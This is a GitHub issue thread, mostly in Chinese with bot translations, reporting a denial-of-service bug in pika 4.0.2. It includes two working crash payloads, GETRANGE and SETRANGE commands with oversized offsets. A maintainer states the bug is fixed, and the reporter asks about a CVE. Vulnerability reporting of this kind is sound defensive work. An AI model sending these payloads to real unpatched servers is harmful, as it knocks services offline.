特殊的 Redis 指令可以导致 pika 服务崩溃

[ankki-zsyang]

Is this a regression?

No

Description

Summary

经过身份验证的用户，可以构建特殊的指令，使 pika 服务产生崩溃。

Details

测试版本：pika 4.0.2

以下两个 payload 都可以造成数据库崩溃：

// GETRANGE 指令（需要重复执行两次）：
set key1 abc
GETRANGE key1 1 4294967296

// SETRANGE 指令：
set key1 abc
SETRANGE key1 9223372036854775757 value2

GETRANGE 指令执行结果：


SETRANGE 指令执行结果：

Credit

此问题由深圳昂楷科技的 ankki-zsyang 发现。

Please provide a link to a minimal reproduction of the bug

No response

Screenshots or videos

No response

Please provide the version you discovered this bug in (check about page for version information)

Anything else?

No response

[Issues-translate-bot]

Bot detected the issue body's language is not English, translate it automatically.

---

Title: Special Redis directive can cause pika service to crash

[YuCai18]

Is this a regression?

No

Description

Summary

经过身份验证的用户，可以构建特殊的指令，使 pika 服务产生崩溃。

Details

测试版本：pika 4.0.2 以下两个 payload 都可以造成数据库崩溃：

// GETRANGE 指令（需要重复执行两次）：
set key1 abc
GETRANGE key1 1 4294967296

// SETRANGE 指令：
set key1 abc
SETRANGE key1 9223372036854775757 value2
GETRANGE 指令执行结果： SETRANGE 指令执行结果：

Credit

此问题由深圳昂楷科技的 ankki-zsyang 发现。

Please provide a link to a minimal reproduction of the bug

No response

Screenshots or videos

No response

Please provide the version you discovered this bug in (check about page for version information)

Anything else?

No response

bug已经修复了，具体详情请见 #3100

[Issues-translate-bot]

Bot detected the issue body's language is not English, translate it automatically.

---

Can I apply for a CVE number for this question?

[ankki-zsyang]

我可以为此问题申请一个CVE编号吗？

[Issues-translate-bot]

Bot detected the issue body's language is not English, translate it automatically.

---

Can I apply for a CVE number for this question?

[YuCai18]

这个问题已经修复了

[Issues-translate-bot]

Bot detected the issue body's language is not English, translate it automatically.

---

This issue has been fixed